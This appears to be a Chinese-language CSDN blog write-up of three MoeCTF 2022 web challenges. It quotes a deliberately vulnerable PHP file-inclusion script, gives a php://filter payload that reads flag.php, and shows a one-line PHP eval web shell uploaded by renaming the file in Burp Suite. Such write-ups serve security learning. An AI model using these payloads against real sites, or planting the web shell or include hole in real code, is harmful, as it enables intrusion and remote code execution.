[MoeCTF 2022]WEB刷题记录

最新推荐文章于 2024-07-29 17:15:00 发布
最新推荐文章于 2024-07-29 17:15:00 发布
阅读量111 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73239569/article/details/134606548
版权

1.[MoeCTF 2022]baby_file

打开环境,看到这个脚本

<html>
<title>Here's a secret. Can you find it?</title>
<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
?>
</html>

进行代码审计。这个php脚本当用户访问这个网页并传递一个名为"file"的GET参数时,它会包含并显示该文件的内容。如果没有提供"file"参数,它将高亮显示当前执行的PHP文件的内容。

看见有include函数了,可以想到是文件包含。

但是这里并不能直接传入file的值等于index.php或者flag.php,所以要利用伪协议php://filter,构造payload来读取index.php的内容。

猜测flag在同目录下flag.php中或根目录下/flag中。写出payload。

/?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解密可得

<?php
Hey hey, reach the highest city in the world! Actually I am ikun!!;

NSSCTF{0dbdb8b6-9c46-4a7f-a7d0-a51a69776740};

?>

2.[MoeCTF 2022]ezhtml

启动环境,熟悉的页面。

看到并没有什么特别的,F12查看一下源码。然后在js中一眼就看到啦。

3.[MoeCTF 2022]what are y0u uploading?

根据题目描述,打开环境,文件上传题。

上传一句话木马,标题说了,先尝试上传图片文件。

<?php @eval($_REQUEST['wz']);?>

 上传成功了。

但是不知道文件路径,不能getshell,那就按照他要求上传一个f1ag.php

直接将图片马的名字改成f1ag.php,进行上传

传不上去,启动BurpSuite

将名字从a.jpg改成f1ag.php

这样forward之后就可以得到flag了。

继续学吧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
Web入门指北1
08-03
学习Web安全的平台有MoeCTF 2021和Bugku CTF等,初学者可以通过查看目的解答(writeup)来巩固基础和扩展视野。在遇到难时,可以寻求社区支持,例如加入MoeCTF比赛群并向管理员求助。 总之,Web安全是一个涵盖...
2021-Web-TeamWork:完成西安电子科技大学2021年Web相关的开发任务
04-19
在本项目"2021-Web-TeamWork"中,团队主要负责的是为西安电子科技大学完成2021年度的Web相关开发任务。这涵盖了Web应用开发的多个方面,包括但不限于前端界面设计、后端服务构建、数据库管理以及用户交互体验优化。...
NSSCTF刷题笔记web23——[MoeCTF 2022]baby_file
qq_45692883的博客
01-26 231
直接php://filter读文件。看上去是个很简单的文件包含。目录扫到flag.php
NSS [MoeCTF 2022]baby_file
Jay17的博客
08-07 600
NSS [MoeCTF 2022]baby_file
NSS目练习7
cyy001128的博客
06-05 780
json_decode接受一个JSON格式的字符串并且把它转换为PHP变量,当该参数assoc为TRUE时,将返回array,否则返回object。Referer 是另一个 HTTP 请求头部字段,它包含了当前请求的来源页面 URL 地址,即前一个页面的 URL 地址。第三层,get_flag接收参数,作为系统命令执行,传参不能有空格,如果有cat,将会被替换为wctf2020。先用dirsearch扫描一下,发现有三个东西,但是不能直接访问flag.php。打开后看到源代码,关闭了报错,有三层绕过。
[MoeCTF 2022]——Web方向 wp
Leaf_initial的博客
08-09 1529
海纳百川,有容乃大;壁立千仞,无欲则刚。” 寓意人要像大海能容纳无数江河水一样的胸襟宽广,以容纳和融合来对他人。(我们坤坤都这么努力了,你们为什么还要黑他!!!?小黑子们真虾头!!???黑我家哥哥是吧打开环境后源码如下看见有include函数了,可以想到是文件包含但是这里并不能直接传入file的值等于index.php或者flag.php,所以要利用php伪协议构造payload来读取index.php的内容访问后得到base64编码后的index.php解码base64解码得到源代码。
MoeCTF2022 部分Crypto 复现
Luiino的博客
11-05 2920
用基础方法解不出来,原因是e与phi_n不互素,又phi_n = (p-1)*(q-1),求gcd(e,(p-1))和gcd(e,(q-1)),发现e与p-1互素。choice用法:从非空序列中随机选取一个数据并带回,该序列可以是list、tuple、str、set。,计算delt + N是否为完全平方数,如果为完全平方数,那么delt + N =Wilson定理:如果p是素数,则(p − 1)!可以知道p、q相近,则|p-q|很小,进而。因此,我们可以爆破差值delt,即。与 N 相差很小,从而。
百度贴吧签到网站源码Java-moectf-wp:XDSEC协会2019招新赛moectf之xiaohuihuiWriteup
06-06
moeCTF author: xiaohuihui Sign In 你是西电新生嘛? XDSEC 2019招新信息放送群 614458628 加群时请务必注明姓名学号 其它学校选手请绕行!谢谢合作 此是签到,加入 招新群,在公告中即可找到flag信息 moectf{0...
部分ctf-web
weixin_66669317的博客
12-06 1460
ctfweb部分
FastDDS中的线程梳理
u010378559的博客
07-29 383
Fast DDS中的线程梳理和代码分析,详解
TCP请求如何获取客户端真实源IP地址
ajax_beijing_java的博客
07-29 329
针对四层的TCP请求(TCP监听器),可以通过在后端主机配置TOA插件获取客户端的真实源IP地址。TOA是操作系统的内核模块,需要在ELB后端主机中安装TOA插件,以实现后端主机可获取客户端真实源IP地址的目的。c. 编译过程若未提示warning或者error,说明编译成功,检查当前目录下是否已经生成toa.ko文件。假如提示信息中包含“TOA: toa loaded”,则证明内核模块已经加载成功。f. 以下步骤是以Ubuntu、Debian环境为例,进行编译环境准备。主备、集群模式资源池列表见。
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 352
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问。我们可以借助这些小巧、功能强悍的工具帮助我们排查问、解决问...
第三周:网络应用(上)
Vincent_Zhang233的博客
07-26 240
一、网络应用(层)内容概述我们已经知道,Internet的体系结构是符合TCP/IP协议栈的,而“应用层”就在这个协议的最上层。
S5730举例
jjjxxxhhh123的博客
07-27 964
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
网络安全在2024好入行吗?
最新发布
2401_84466225的博客
07-29 495
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
使用WebSocket协议调用群发方法将消息返回客户端页面
2302_79840586的博客
07-27 1041
使用WebSocket协议调用群发方法将消息返回客户端页面
网络编程 - 粘包与拆包第二弹 - Netty粘包与拆包问的技术解决方案
逍遥Sean的博客
07-29 712
Netty是一个高性能的异步事件驱动的网络应用框架,专注于快速开发可维护的高性能协议服务器和客户端。它提供了一系列的解决方案来处理TCP粘包与拆包问,使得开发者可以专注于业务逻辑而不必过多关注底层网络细节。通过使用Netty提供的解码器和编码器,我们可以有效地处理TCP粘包与拆包问,提升网络应用的稳定性和性能。选择合适的解决方案取决于你的具体业务需求和协议设计。希望本文能帮助读者深入理解和解决TCP粘包与拆包问,在实际应用中获得更好的开发体验和性能优化。
【计算机网络】OSPF单区域实验
m0_65787507的博客
07-26 920
DR和BDR是由同一网段中所有的路由器根据路由优先级和Router ID通过Hello报文选举出来的,只有优先级大于0的路由器才具有选举资格。进行DR/BDR选举时每台路由器将自己选出的DR写入Hello报文中,发给网段上的每台运行OSPF协议的路由器。如果DR或BDR失效,或者有新的路由器加入网络并希望成为DR或BDR,那么它们将参与新的选举过程。4:非DR路由器将自己的LSA发送给DR,然后DR将这些LSA泛洪到整个区域,使所有路由器获得一致的LSDB,从而确保区域内路由器都能计算出相同的最短路径树。
moectf2023
08-19
- *2* *3* [MoeCTF2022 部分Crypto 复现](https://blog.csdn.net/Luiino/article/details/127702178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

继续学吧

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值